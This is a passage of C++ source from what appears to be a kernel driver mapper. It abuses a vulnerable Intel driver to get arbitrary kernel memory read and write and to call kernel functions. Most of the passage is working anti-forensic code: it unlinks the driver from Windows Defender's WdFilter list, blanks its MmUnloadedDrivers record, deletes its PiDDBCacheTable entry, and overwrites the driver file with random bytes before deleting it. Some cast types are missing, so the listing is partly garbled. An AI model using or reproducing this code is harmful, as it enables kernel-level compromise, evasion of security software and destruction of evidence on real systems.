(ReadMemory(device_handle, (uintptr_t)Unicode_String.Buffer, ImageName.get(), Unicode_String.Length)) { 308 | if (wcsstr(ImageName.get(), intel_driver::GetDriverNameW().c_str())) { 309 | 310 | //remove from RuntimeDriversArray 311 | bool removedRuntimeDriversArray = false; 312 | PVOID SameIndexList = (PVOID)((uintptr_t)Entry - 0x10); 313 | for (int k = 0; k < 256; k++) { // max RuntimeDriversArray 
elements 314 | PVOID value = 0; 315 | ReadMemory(device_handle, RuntimeDriversArray + (k * 8), &value, sizeof(PVOID)); 316 | if (value == SameIndexList) { 317 | PVOID emptyval = (PVOID)(RuntimeDriversCount + 1); // this is not count+1 is position of cout addr+1 318 | WriteMemory(device_handle, RuntimeDriversArray + (k * 8), &emptyval, sizeof(PVOID)); 319 | removedRuntimeDriversArray = true; 320 | break; 321 | } 322 | } 323 | 324 | if (!removedRuntimeDriversArray) { 325 | Log("[!] Failed to remove from RuntimeDriversArray" << std::endl); 326 | return false; 327 | } 328 | 329 | auto NextEntry = ReadListEntry(uintptr_t(Entry) + (offsetof(struct _LIST_ENTRY, Flink))); 330 | auto PrevEntry = ReadListEntry(uintptr_t(Entry) + (offsetof(struct _LIST_ENTRY, Blink))); 331 | 332 | WriteMemory(device_handle, uintptr_t(NextEntry) + (offsetof(struct _LIST_ENTRY, Blink)), &PrevEntry, sizeof(LIST_ENTRY::Blink)); 333 | WriteMemory(device_handle, uintptr_t(PrevEntry) + (offsetof(struct _LIST_ENTRY, Flink)), &NextEntry, sizeof(LIST_ENTRY::Flink)); 334 | 335 | // decrement RuntimeDriversCount 336 | ULONG current = 0; 337 | ReadMemory(device_handle, RuntimeDriversCount, ¤t, sizeof(ULONG)); 338 | current--; 339 | WriteMemory(device_handle, RuntimeDriversCount, ¤t, sizeof(ULONG)); 340 | 341 | // call MpFreeDriverInfoEx 342 | uintptr_t DriverInfo = (uintptr_t)Entry - 0x20; 343 | 344 | //verify DriverInfo Magic 345 | USHORT Magic = 0; 346 | ReadMemory(device_handle, DriverInfo, &Magic, sizeof(USHORT)); 347 | if (Magic != 0xDA18) { 348 | Log("[!] 
DriverInfo Magic is invalid, new wdfilter version?, driver info will not be released to prevent bsod" << std::endl); 349 | } 350 | else { 351 | CallKernelFunction(device_handle, nullptr, MpFreeDriverInfoEx, DriverInfo); 352 | } 353 | 354 | Log("[+] WdFilterDriverList Cleaned: " << ImageName << std::endl); 355 | return true; 356 | } 357 | } 358 | } 359 | } 360 | return false; 361 | } 362 | 363 | bool intel_driver::Unload(HANDLE device_handle) { 364 | Log(L"[<] Unloading vulnerable driver" << std::endl); 365 | 366 | if (device_handle && device_handle != INVALID_HANDLE_VALUE) { 367 | CloseHandle(device_handle); 368 | } 369 | 370 | if (!service::StopAndRemove(GetDriverNameW())) 371 | return false; 372 | 373 | std::wstring driver_path = GetDriverPath(); 374 | 375 | //Destroy disk information before unlink from disk to prevent any recover of the file 376 | std::ofstream file_ofstream(driver_path.c_str(), std::ios_base::out | std::ios_base::binary); 377 | int newFileLen = sizeof(intel_driver_resource::driver) + (((long long)rand()*(long long)rand()) % 2000000 + 1000); 378 | BYTE* randomData = new BYTE[newFileLen]; 379 | for (size_t i = 0; i < newFileLen; i++) { 380 | randomData[i] = (BYTE)(rand() % 255); 381 | } 382 | if (!file_ofstream.write((char*)randomData, newFileLen)) { 383 | Log(L"[!] 
Error dumping shit inside the disk" << std::endl); 384 | } 385 | else { 386 | Log(L"[+] Vul driver data destroyed before unlink" << std::endl); 387 | } 388 | file_ofstream.close(); 389 | delete[] randomData; 390 | 391 | //unlink the file 392 | if (_wremove(driver_path.c_str()) != 0) 393 | return false; 394 | 395 | return true; 396 | } 397 | 398 | bool intel_driver::MemCopy(HANDLE device_handle, uint64_t destination, uint64_t source, uint64_t size) { 399 | if (!destination || !source || !size) 400 | return 0; 401 | 402 | COPY_MEMORY_BUFFER_INFO copy_memory_buffer = { 0 }; 403 | 404 | copy_memory_buffer.case_number = 0x33; 405 | copy_memory_buffer.source = source; 406 | copy_memory_buffer.destination = destination; 407 | copy_memory_buffer.length = size; 408 | 409 | DWORD bytes_returned = 0; 410 | return DeviceIoControl(device_handle, ioctl1, ©_memory_buffer, sizeof(copy_memory_buffer), nullptr, 0, &bytes_returned, nullptr); 411 | } 412 | 413 | bool intel_driver::SetMemory(HANDLE device_handle, uint64_t address, uint32_t value, uint64_t size) { 414 | if (!address || !size) 415 | return 0; 416 | 417 | FILL_MEMORY_BUFFER_INFO fill_memory_buffer = { 0 }; 418 | 419 | fill_memory_buffer.case_number = 0x30; 420 | fill_memory_buffer.destination = address; 421 | fill_memory_buffer.value = value; 422 | fill_memory_buffer.length = size; 423 | 424 | DWORD bytes_returned = 0; 425 | return DeviceIoControl(device_handle, ioctl1, &fill_memory_buffer, sizeof(fill_memory_buffer), nullptr, 0, &bytes_returned, nullptr); 426 | } 427 | 428 | bool intel_driver::GetPhysicalAddress(HANDLE device_handle, uint64_t address, uint64_t* out_physical_address) { 429 | if (!address) 430 | return 0; 431 | 432 | GET_PHYS_ADDRESS_BUFFER_INFO get_phys_address_buffer = { 0 }; 433 | 434 | get_phys_address_buffer.case_number = 0x25; 435 | get_phys_address_buffer.address_to_translate = address; 436 | 437 | DWORD bytes_returned = 0; 438 | 439 | if (!DeviceIoControl(device_handle, ioctl1, 
&get_phys_address_buffer, sizeof(get_phys_address_buffer), nullptr, 0, &bytes_returned, nullptr)) 440 | return false; 441 | 442 | *out_physical_address = get_phys_address_buffer.return_physical_address; 443 | return true; 444 | } 445 | 446 | uint64_t intel_driver::MapIoSpace(HANDLE device_handle, uint64_t physical_address, uint32_t size) { 447 | if (!physical_address || !size) 448 | return 0; 449 | 450 | MAP_IO_SPACE_BUFFER_INFO map_io_space_buffer = { 0 }; 451 | 452 | map_io_space_buffer.case_number = 0x19; 453 | map_io_space_buffer.physical_address_to_map = physical_address; 454 | map_io_space_buffer.size = size; 455 | 456 | DWORD bytes_returned = 0; 457 | 458 | if (!DeviceIoControl(device_handle, ioctl1, &map_io_space_buffer, sizeof(map_io_space_buffer), nullptr, 0, &bytes_returned, nullptr)) 459 | return 0; 460 | 461 | return map_io_space_buffer.return_virtual_address; 462 | } 463 | 464 | bool intel_driver::UnmapIoSpace(HANDLE device_handle, uint64_t address, uint32_t size) { 465 | if (!address || !size) 466 | return false; 467 | 468 | UNMAP_IO_SPACE_BUFFER_INFO unmap_io_space_buffer = { 0 }; 469 | 470 | unmap_io_space_buffer.case_number = 0x1A; 471 | unmap_io_space_buffer.virt_address = address; 472 | unmap_io_space_buffer.number_of_bytes = size; 473 | 474 | DWORD bytes_returned = 0; 475 | 476 | return DeviceIoControl(device_handle, ioctl1, &unmap_io_space_buffer, sizeof(unmap_io_space_buffer), nullptr, 0, &bytes_returned, nullptr); 477 | } 478 | 479 | bool intel_driver::ReadMemory(HANDLE device_handle, uint64_t address, void* buffer, uint64_t size) { 480 | return MemCopy(device_handle, reinterpret_cast(buffer), address, size); 481 | } 482 | 483 | bool intel_driver::WriteMemory(HANDLE device_handle, uint64_t address, void* buffer, uint64_t size) { 484 | return MemCopy(device_handle, address, reinterpret_cast(buffer), size); 485 | } 486 | 487 | bool intel_driver::WriteToReadOnlyMemory(HANDLE device_handle, uint64_t address, void* buffer, uint32_t size) { 488 | 
if (!address || !buffer || !size) 489 | return false; 490 | 491 | uint64_t physical_address = 0; 492 | 493 | if (!GetPhysicalAddress(device_handle, address, &physical_address)) { 494 | Log(L"[-] Failed to translate virtual address 0x" << reinterpret_cast(address) << std::endl); 495 | return false; 496 | } 497 | 498 | const uint64_t mapped_physical_memory = MapIoSpace(device_handle, physical_address, size); 499 | 500 | if (!mapped_physical_memory) { 501 | Log(L"[-] Failed to map IO space of 0x" << reinterpret_cast(physical_address) << std::endl); 502 | return false; 503 | } 504 | 505 | bool result = WriteMemory(device_handle, mapped_physical_memory, buffer, size); 506 | 507 | #if defined(DISABLE_OUTPUT) 508 | UnmapIoSpace(device_handle, mapped_physical_memory, size); 509 | #else 510 | if (!UnmapIoSpace(device_handle, mapped_physical_memory, size)) 511 | Log(L"[!] Failed to unmap IO space of physical address 0x" << reinterpret_cast(physical_address) << std::endl); 512 | #endif 513 | 514 | 515 | return result; 516 | } 517 | 518 | uint64_t intel_driver::MmAllocateIndependentPagesEx(HANDLE device_handle, uint32_t size) 519 | { 520 | uint64_t allocated_pages{}; 521 | 522 | static uint64_t kernel_MmAllocateIndependentPagesEx = 0; 523 | 524 | #ifdef PDB_OFFSETS 525 | if (!kernel_MmAllocateIndependentPagesEx) 526 | { 527 | kernel_MmAllocateIndependentPagesEx = KDSymbolsHandler::GetInstance()->GetOffset(L"MmAllocateIndependentPagesEx"); 528 | if (!kernel_MmAllocateIndependentPagesEx) { 529 | Log(L"[!] Failed to find MmAllocateIndependentPagesEx" << std::endl); 530 | return 0; 531 | } 532 | kernel_MmAllocateIndependentPagesEx += intel_driver::ntoskrnlAddr; 533 | } 534 | #else 535 | if (!kernel_MmAllocateIndependentPagesEx) 536 | { 537 | //Updated, tested from 1803 to 24H2 538 | //KeAllocateInterrupt -> 41 8B D6 B9 00 10 00 00 E8 ?? ?? ?? ?? 
48 8B D8 539 | kernel_MmAllocateIndependentPagesEx = intel_driver::FindPatternInSectionAtKernel(device_handle, (char*)".text", intel_driver::ntoskrnlAddr, 540 | (BYTE*)"\x41\x8B\xD6\xB9\x00\x10\x00\x00\xE8\x00\x00\x00\x00\x48\x8B\xD8", 541 | (char*)"xxxxxxxxx????xxx"); 542 | if (!kernel_MmAllocateIndependentPagesEx) { 543 | Log(L"[!] Failed to find MmAllocateIndependentPagesEx" << std::endl); 544 | return 0; 545 | } 546 | 547 | kernel_MmAllocateIndependentPagesEx += 8; 548 | 549 | kernel_MmAllocateIndependentPagesEx = (uint64_t)ResolveRelativeAddress(device_handle, (PVOID)kernel_MmAllocateIndependentPagesEx, 1, 5); 550 | if (!kernel_MmAllocateIndependentPagesEx) { 551 | Log(L"[!] Failed to find MmAllocateIndependentPagesEx" << std::endl); 552 | return 0; 553 | } 554 | } 555 | #endif 556 | 557 | if (!intel_driver::CallKernelFunction(device_handle, &allocated_pages, kernel_MmAllocateIndependentPagesEx, size, -1, 0, 0)) 558 | return 0; 559 | 560 | return allocated_pages; 561 | } 562 | 563 | bool intel_driver::MmFreeIndependentPages(HANDLE device_handle, uint64_t address, uint32_t size) 564 | { 565 | static uint64_t kernel_MmFreeIndependentPages = 0; 566 | 567 | if (!kernel_MmFreeIndependentPages) 568 | { 569 | #ifdef PDB_OFFSETS 570 | kernel_MmFreeIndependentPages = KDSymbolsHandler::GetInstance()->GetOffset(L"MmFreeIndependentPages"); 571 | if (!kernel_MmFreeIndependentPages) { 572 | Log(L"[!] Failed to find MmFreeIndependentPages" << std::endl); 573 | return false; 574 | } 575 | kernel_MmFreeIndependentPages += intel_driver::ntoskrnlAddr; 576 | #else 577 | kernel_MmFreeIndependentPages = intel_driver::FindPatternInSectionAtKernel(device_handle, "PAGE", intel_driver::ntoskrnlAddr, 578 | (BYTE*)"\xBA\x00\x60\x00\x00\x48\x8B\xCB\xE8\x00\x00\x00\x00\x48\x8D\x8B\x00\xF0\xFF\xFF", 579 | (char*)"xxxxxxxxx????xxxxxxx"); 580 | if (!kernel_MmFreeIndependentPages) { 581 | Log(L"[!] 
Failed to find MmFreeIndependentPages" << std::endl); 582 | return false; 583 | } 584 | 585 | kernel_MmFreeIndependentPages += 8; 586 | 587 | kernel_MmFreeIndependentPages = (uint64_t)ResolveRelativeAddress(device_handle, (PVOID)kernel_MmFreeIndependentPages, 1, 5); 588 | if (!kernel_MmFreeIndependentPages) { 589 | Log(L"[!] Failed to find MmFreeIndependentPages" << std::endl); 590 | return false; 591 | } 592 | #endif 593 | } 594 | 595 | uint64_t result{}; 596 | return intel_driver::CallKernelFunction(device_handle, &result, kernel_MmFreeIndependentPages, address, size); 597 | } 598 | 599 | BOOLEAN intel_driver::MmSetPageProtection(HANDLE device_handle, uint64_t address, uint32_t size, ULONG new_protect) 600 | { 601 | if (!address) 602 | { 603 | Log(L"[!] Invalid address passed to MmSetPageProtection" << std::endl); 604 | return FALSE; 605 | } 606 | 607 | static uint64_t kernel_MmSetPageProtection = 0; 608 | 609 | if (!kernel_MmSetPageProtection) 610 | { 611 | #ifdef PDB_OFFSETS 612 | kernel_MmSetPageProtection = KDSymbolsHandler::GetInstance()->GetOffset(L"MmSetPageProtection"); 613 | if (!kernel_MmSetPageProtection) { 614 | Log(L"[!] Failed to find MmSetPageProtection" << std::endl); 615 | return FALSE; 616 | } 617 | kernel_MmSetPageProtection += intel_driver::ntoskrnlAddr; 618 | #else 619 | //Updated, tested from 1803 to 24H2 620 | // 0F 45 ? ? 8D ? ? ? FF FF E8 621 | // 0F 45 ? ? 45 8B ? ? ? ? 8D ? ? ? ? ? ? 
FF FF E8 (Some windows builds have a instruction in the middle) 622 | kernel_MmSetPageProtection = intel_driver::FindPatternInSectionAtKernel(device_handle, "PAGELK", intel_driver::ntoskrnlAddr, 623 | (BYTE*)"\x0F\x45\x00\x00\x8D\x00\x00\x00\xFF\xFF\xE8", 624 | (char*)"xx??x???xxx"); 625 | if (!kernel_MmSetPageProtection) { 626 | 627 | kernel_MmSetPageProtection = intel_driver::FindPatternInSectionAtKernel(device_handle, "PAGELK", intel_driver::ntoskrnlAddr, 628 | (BYTE*)"\x0F\x45\x00\x00\x45\x8B\x00\x00\x00\x00\x8D\x00\x00\x00\x00\x00\x00\xFF\xFF\xE8", 629 | (char*)"xx??xx????x???xxx"); 630 | 631 | if (!kernel_MmSetPageProtection) { 632 | Log(L"[!] Failed to find MmSetPageProtection" << std::endl); 633 | return FALSE; 634 | } 635 | 636 | kernel_MmSetPageProtection += 13; 637 | } 638 | else { 639 | kernel_MmSetPageProtection += 10; 640 | } 641 | 642 | kernel_MmSetPageProtection = (uint64_t)ResolveRelativeAddress(device_handle, (PVOID)kernel_MmSetPageProtection, 1, 5); 643 | if (!kernel_MmSetPageProtection) { 644 | Log(L"[!] Failed to find MmSetPageProtection" << std::endl); 645 | return FALSE; 646 | } 647 | #endif 648 | } 649 | 650 | BOOLEAN set_prot_status{}; 651 | if (!intel_driver::CallKernelFunction(device_handle, &set_prot_status, kernel_MmSetPageProtection, address, size, new_protect)) 652 | return FALSE; 653 | 654 | return set_prot_status; 655 | } 656 | 657 | uint64_t intel_driver::AllocatePool(HANDLE device_handle, nt::POOL_TYPE pool_type, uint64_t size) { 658 | if (!size) 659 | return 0; 660 | 661 | static uint64_t kernel_ExAllocatePool = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "ExAllocatePoolWithTag"); 662 | 663 | if (!kernel_ExAllocatePool) { 664 | Log(L"[!] 
Failed to find ExAllocatePool" << std::endl);
		return 0;
	}

	uint64_t allocated_pool = 0;

	if (!CallKernelFunction(device_handle, &allocated_pool, kernel_ExAllocatePool, pool_type, size, 'BwtE')) //Changed pool tag since an extremely meme checking diff between allocation size and average for detection....
		return 0;

	return allocated_pool;
}

// Frees a kernel pool allocation by invoking the kernel's ExFreePool through
// CallKernelFunction.
//
// device_handle: handle to the driver device used for all kernel access here.
// address:       kernel address to free; 0 is rejected.
// Returns the result of CallKernelFunction, or false (0) when address is 0 or
// the export cannot be resolved. The export address is resolved on first use
// and cached in a function-local static.
// NOTE(review): the failure message below names ExAllocatePool although the
// lookup is for ExFreePool.
bool intel_driver::FreePool(HANDLE device_handle, uint64_t address) {
	if (!address)
		return 0;

	static uint64_t kernel_ExFreePool = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "ExFreePool");

	if (!kernel_ExFreePool) {
		Log(L"[!] Failed to find ExAllocatePool" << std::endl);
		return 0;
	}

	return CallKernelFunction(device_handle, nullptr, kernel_ExFreePool, address);
}

// Resolves an export of a loaded kernel module by name.
//
// Reads the DOS and NT headers at kernel_module_base through ReadMemory,
// copies the whole export directory into a user-mode buffer, and walks the
// name table with a case-insensitive compare (_stricmp).
//
// Returns the absolute address (kernel_module_base + RVA) of the export, or 0
// when the base is 0, a header signature does not match, the module has no
// export directory, a read fails, the name is not found, the RVA is <= 0x1000,
// or the address falls inside the export directory range.
//
// NOTE(review): the cast target types in this listing are missing (they appear
// to have been lost when the page was extracted); confirm against the
// repository before building.
// NOTE(review): the VirtualAlloc result is used without a null check, and the
// table RVAs, name RVAs and ordinals taken from the copied directory are
// dereferenced without being bounded by export_base_size.
uint64_t intel_driver::GetKernelModuleExport(HANDLE device_handle, uint64_t kernel_module_base, const std::string& function_name) {
	if (!kernel_module_base)
		return 0;

	IMAGE_DOS_HEADER dos_header = { 0 };
	IMAGE_NT_HEADERS64 nt_headers = { 0 };

	// Both header reads go through the driver; each signature is checked
	// before the next offset is trusted.
	if (!ReadMemory(device_handle, kernel_module_base, &dos_header, sizeof(dos_header)) || dos_header.e_magic != IMAGE_DOS_SIGNATURE ||
		!ReadMemory(device_handle, kernel_module_base + dos_header.e_lfanew, &nt_headers, sizeof(nt_headers)) || nt_headers.Signature != IMAGE_NT_SIGNATURE)
		return 0;

	const auto export_base = nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
	const auto export_base_size = nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;

	if (!export_base || !export_base_size)
		return 0;

	// User-mode copy of the export directory; released on every path below
	// except the one flagged further down.
	const auto export_data = reinterpret_cast(VirtualAlloc(nullptr, export_base_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE));

	if (!ReadMemory(device_handle, kernel_module_base + export_base, export_data, export_base_size))
	{
		VirtualFree(export_data, 0, MEM_RELEASE);
		return 0;
	}

	// Adding delta to an RVA from the directory yields a pointer into the
	// local copy (local buffer address minus the directory's RVA).
	const auto delta = reinterpret_cast(export_data) - export_base;

	const auto name_table = reinterpret_cast(export_data->AddressOfNames + delta);
	const auto ordinal_table = reinterpret_cast(export_data->AddressOfNameOrdinals + delta);
	const auto function_table = reinterpret_cast(export_data->AddressOfFunctions + delta);

	for (auto i = 0u; i < export_data->NumberOfNames; ++i) {
		const std::string current_function_name = std::string(reinterpret_cast(name_table[i] + delta));

		if (!_stricmp(current_function_name.c_str(), function_name.c_str())) {
			const auto function_ordinal = ordinal_table[i];
			if (function_table[function_ordinal] <= 0x1000) {
				// Wrong function address?
				// NOTE(review): this return does not release export_data.
				return 0;
			}
			const auto function_address = kernel_module_base + function_table[function_ordinal];

			// An address inside the export directory itself is rejected
			// rather than followed.
			if (function_address >= kernel_module_base + export_base && function_address <= kernel_module_base + export_base + export_base_size) {
				VirtualFree(export_data, 0, MEM_RELEASE);
				return 0; // No forwarded exports on 64bit?
			}

			VirtualFree(export_data, 0, MEM_RELEASE);
			return function_address;
		}
	}

	VirtualFree(export_data, 0, MEM_RELEASE);
	return 0;
}

// Sets to zero the Length of the UNICODE_STRING stored at driver_section + 0x58
// for the driver that owns device_handle.
//
// Steps, as written:
//   1. Query SystemExtendedHandleInformation, growing the buffer while the call
//      reports STATUS_INFO_LENGTH_MISMATCH, and find the kernel object address
//      recorded for device_handle in the current process.
//   2. Follow object + 0x8 -> device_object + 0x8 -> driver_object + 0x28 ->
//      driver_section with ReadMemory.
//   3. Read the UNICODE_STRING at driver_section + 0x58, copy the name it
//      points to for logging, then write the structure back with Length = 0.
//
// Returns true only when the final write succeeds.
//
// The offsets are hard-coded. NOTE(review): presumably FILE_OBJECT.DeviceObject,
// DEVICE_OBJECT.DriverObject, DRIVER_OBJECT.DriverSection and the loader
// entry's BaseDllName; confirm against the Windows builds in scope.
//
// Forensic relevance: per the author's inline comment the kernel only records
// an unloaded driver whose name length is > 0, so after this runs the absence
// of the driver from the unloaded-drivers list is not evidence that it was
// never loaded.
bool intel_driver::ClearMmUnloadedDrivers(HANDLE device_handle) {
	ULONG buffer_size = 0;
	void* buffer = nullptr;

	// First call is made with a null buffer to obtain the required size.
	NTSTATUS status = NtQuerySystemInformation(static_cast(nt::SystemExtendedHandleInformation), buffer, buffer_size, &buffer_size);

	while (status == nt::STATUS_INFO_LENGTH_MISMATCH)
	{
		VirtualFree(buffer, 0, MEM_RELEASE);

		buffer = VirtualAlloc(nullptr, buffer_size, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
		status = NtQuerySystemInformation(static_cast(nt::SystemExtendedHandleInformation), buffer, buffer_size, &buffer_size);
	}

	if (!NT_SUCCESS(status) || buffer == 0)
	{
		if (buffer != 0)
			VirtualFree(buffer, 0, MEM_RELEASE);
		return false;
	}

	uint64_t object = 0;

	auto system_handle_inforamtion = static_cast(buffer);

	// Only handles owned by this process are considered; the match is on the
	// handle value.
	for (auto i = 0u; i < system_handle_inforamtion->HandleCount; ++i)
	{
		const nt::SYSTEM_HANDLE current_system_handle = system_handle_inforamtion->Handles[i];

		if (current_system_handle.UniqueProcessId != reinterpret_cast(static_cast(GetCurrentProcessId())))
			continue;

		if (current_system_handle.HandleValue == device_handle)
		{
			object = reinterpret_cast(current_system_handle.Object);
			break;
		}
	}

	VirtualFree(buffer, 0, MEM_RELEASE);

	if (!object)
		return false;

	uint64_t device_object = 0;

	if (!ReadMemory(device_handle, object + 0x8, &device_object, sizeof(device_object)) || !device_object) {
		Log(L"[!] Failed to find device_object" << std::endl);
		return false;
	}

	uint64_t driver_object = 0;

	if (!ReadMemory(device_handle, device_object + 0x8, &driver_object, sizeof(driver_object)) || !driver_object) {
		Log(L"[!] Failed to find driver_object" << std::endl);
		return false;
	}

	uint64_t driver_section = 0;

	if (!ReadMemory(device_handle, driver_object + 0x28, &driver_section, sizeof(driver_section)) || !driver_section) {
		Log(L"[!] Failed to find driver_section" << std::endl);
		return false;
	}

	UNICODE_STRING us_driver_base_dll_name = { 0 };

	if (!ReadMemory(device_handle, driver_section + 0x58, &us_driver_base_dll_name, sizeof(us_driver_base_dll_name)) || us_driver_base_dll_name.Length == 0) {
		Log(L"[!] Failed to find driver name" << std::endl);
		return false;
	}

	// Length is in bytes; the buffer holds Length / 2 characters plus one
	// extra element.
	auto unloadedName = std::make_unique((ULONG64)us_driver_base_dll_name.Length / 2ULL + 1ULL);
	if (!ReadMemory(device_handle, (uintptr_t)us_driver_base_dll_name.Buffer, unloadedName.get(), us_driver_base_dll_name.Length)) {
		Log(L"[!] Failed to read driver name" << std::endl);
		return false;
	}

	us_driver_base_dll_name.Length = 0; //MiRememberUnloadedDriver will check if the length > 0 to save the unloaded driver

	// The whole UNICODE_STRING is written back; only Length was changed.
	if (!WriteMemory(device_handle, driver_section + 0x58, &us_driver_base_dll_name, sizeof(us_driver_base_dll_name))) {
		Log(L"[!] Failed to write driver name length" << std::endl);
		return false;
	}

	Log(L"[+] MmUnloadedDrivers Cleaned: " << unloadedName << std::endl);
	return true;
}

// Computes the target of a relative reference inside a kernel instruction.
//
// Reads a signed 32-bit displacement from kernel memory at
// Instruction + OffsetOffset and returns
// Instruction + InstructionSize + displacement.
// Returns nullptr when the read fails.
PVOID intel_driver::ResolveRelativeAddress(HANDLE device_handle, _In_ PVOID Instruction, _In_ ULONG OffsetOffset, _In_ ULONG InstructionSize) {
	ULONG_PTR Instr = (ULONG_PTR)Instruction;
	LONG RipOffset = 0;
	if (!ReadMemory(device_handle, Instr + OffsetOffset, &RipOffset, sizeof(LONG))) {
		return nullptr;
	}
	PVOID ResolvedAddr = (PVOID)(Instr + InstructionSize + RipOffset);
	return ResolvedAddr;
}

// Invokes the kernel export ExAcquireResourceExclusiveLite on Resource through
// CallKernelFunction, passing `wait` through.
//
// Returns true only when the call was dispatched and the kernel routine
// returned non-zero; false for a null Resource or an unresolved export. The
// export address is cached in a function-local static.
bool intel_driver::ExAcquireResourceExclusiveLite(HANDLE device_handle, PVOID Resource, BOOLEAN wait) {
	if (!Resource)
		return 0;

	static uint64_t kernel_ExAcquireResourceExclusiveLite = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "ExAcquireResourceExclusiveLite");

	if (!kernel_ExAcquireResourceExclusiveLite) {
		Log(L"[!] Failed to find ExAcquireResourceExclusiveLite" << std::endl);
		return 0;
	}

	// Left uninitialized; it is only read when CallKernelFunction returns
	// true because of the short-circuit && below.
	BOOLEAN out;

	return (CallKernelFunction(device_handle, &out, kernel_ExAcquireResourceExclusiveLite, Resource, wait) && out);
}

// Invokes the kernel export ExReleaseResourceLite on Resource through
// CallKernelFunction.
//
// Returns the result of CallKernelFunction; false for a null Resource or an
// unresolved export. The export address is cached in a function-local static.
bool intel_driver::ExReleaseResourceLite(HANDLE device_handle, PVOID Resource) {
	if (!Resource)
		return false;

	static uint64_t kernel_ExReleaseResourceLite = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "ExReleaseResourceLite");

	if (!kernel_ExReleaseResourceLite) {
		Log(L"[!] 
Failed to find ExReleaseResourceLite" << std::endl);
		return false;
	}

	return CallKernelFunction(device_handle, nullptr, kernel_ExReleaseResourceLite, Resource);
}

// Invokes the kernel export RtlDeleteElementGenericTableAvl(Table, Buffer)
// through CallKernelFunction.
//
// Returns true only when the call was dispatched and the kernel routine
// reported success; false for a null Table or an unresolved export. The export
// address is cached in a function-local static.
// NOTE(review): the result is received into a C++ `bool` while the function's
// declared return type is BOOLEAN; confirm that CallKernelFunction writes
// exactly sizeof(bool) bytes here.
BOOLEAN intel_driver::RtlDeleteElementGenericTableAvl(HANDLE device_handle, PVOID Table, PVOID Buffer) {
	if (!Table)
		return false;

	static uint64_t kernel_RtlDeleteElementGenericTableAvl = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "RtlDeleteElementGenericTableAvl");

	if (!kernel_RtlDeleteElementGenericTableAvl) {
		Log(L"[!] Failed to find RtlDeleteElementGenericTableAvl" << std::endl);
		return false;
	}

	// Only read when CallKernelFunction returns true (short-circuit &&).
	bool out;
	return (CallKernelFunction(device_handle, &out, kernel_RtlDeleteElementGenericTableAvl, Table, Buffer) && out);
}

// Invokes the kernel export RtlLookupElementGenericTableAvl(Table, Buffer)
// through CallKernelFunction and returns the pointer it yields.
//
// Returns nullptr for a null Table or an unresolved export, and 0 when the
// call cannot be dispatched.
// The function-local static below is named kernel_RtlDeleteElementGenericTableAvl
// but holds the address of the Lookup export; it is a separate variable from
// the one in RtlDeleteElementGenericTableAvl.
PVOID intel_driver::RtlLookupElementGenericTableAvl(HANDLE device_handle, nt::PRTL_AVL_TABLE Table, PVOID Buffer) {
	if (!Table)
		return nullptr;

	static uint64_t kernel_RtlDeleteElementGenericTableAvl = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "RtlLookupElementGenericTableAvl");

	if (!kernel_RtlDeleteElementGenericTableAvl) {
		Log(L"[!] 
Failed to find RtlLookupElementGenericTableAvl" << std::endl);
		return nullptr;
	}

	PVOID out;

	if (!CallKernelFunction(device_handle, &out, kernel_RtlDeleteElementGenericTableAvl, Table, Buffer))
		return 0;

	return out;
}


// Looks up the PiDDBCacheTable entry matching (name, timestamp).
//
// Builds a local nt::PiDDBCacheEntry used as the search key: TimeDateStamp is
// `timestamp`, DriverName points at `name` with Length = wcslen(name) * 2 and
// MaximumLength = Length + 2. The address of that local is what gets passed
// to the kernel lookup routine.
// Returns whatever RtlLookupElementGenericTableAvl returns, cast to an entry
// pointer (a kernel address, or null).
nt::PiDDBCacheEntry* intel_driver::LookupEntry(HANDLE device_handle, nt::PRTL_AVL_TABLE PiDDBCacheTable, ULONG timestamp, const wchar_t * name) {

	nt::PiDDBCacheEntry localentry{};
	localentry.TimeDateStamp = timestamp;
	localentry.DriverName.Buffer = (PWSTR)name;
	localentry.DriverName.Length = (USHORT)(wcslen(name) * 2);
	localentry.DriverName.MaximumLength = localentry.DriverName.Length + 2;

	return (nt::PiDDBCacheEntry*)RtlLookupElementGenericTableAvl(device_handle, PiDDBCacheTable, (PVOID)&localentry);
}

// Removes one entry from the kernel's PiDDBCacheTable: the entry whose key is
// the name returned by GetDriverNameW() and the timestamp iqvw64e_timestamp.
//
// Locating the globals:
//   - with PDB_OFFSETS defined, PiDDBLock and PiDDBCacheTable are taken as
//     ntoskrnl base + symbol offset from KDSymbolsHandler;
//   - otherwise the PAGE section of ntoskrnl is scanned for byte patterns
//     (the inline comments tie them to specific builds), a per-pattern
//     constant is added to the hit, and ResolveRelativeAddress turns the
//     instruction at that position into the address it references.
//
// Modification, performed while holding PiDDBLock exclusively:
//   1. look the entry up in the AVL table;
//   2. unlink it from the doubly linked list (prev->Flink = next,
//      next->Blink = prev);
//   3. delete it from the AVL table;
//   4. decrement the table's DeleteCount if it is non-zero.
// The lock is released on every exit path after it was acquired.
//
// Returns true when the entry was found and removed, false otherwise.
//
// Forensic relevance: after a successful run the table no longer lists the
// driver and DeleteCount is put back, so this table on its own cannot be
// treated as a complete record of drivers that were loaded. Evidence held
// outside these kernel structures is not touched by this function.
bool intel_driver::ClearPiDDBCacheTable(HANDLE device_handle) { //PiDDBCacheTable added on LoadDriver

#ifdef PDB_OFFSETS
	auto PiDDBLockOffset = KDSymbolsHandler::GetInstance()->GetOffset(L"PiDDBLock");
	if (!PiDDBLockOffset)
	{
		Log(L"[-] Warning PiDDBLock not found" << std::endl);
		return false;
	}

	auto PiDDBCacheTableOffset = KDSymbolsHandler::GetInstance()->GetOffset(L"PiDDBCacheTable");
	if (!PiDDBLockOffset)
	{
		Log(L"[-] Warning PiDDBCacheTable not found" << std::endl);
		return false;
	}

	PVOID PiDDBLock = (PVOID)(intel_driver::ntoskrnlAddr + PiDDBLockOffset);
	nt::PRTL_AVL_TABLE PiDDBCacheTable = (nt::PRTL_AVL_TABLE)(intel_driver::ntoskrnlAddr + PiDDBCacheTableOffset);
#else
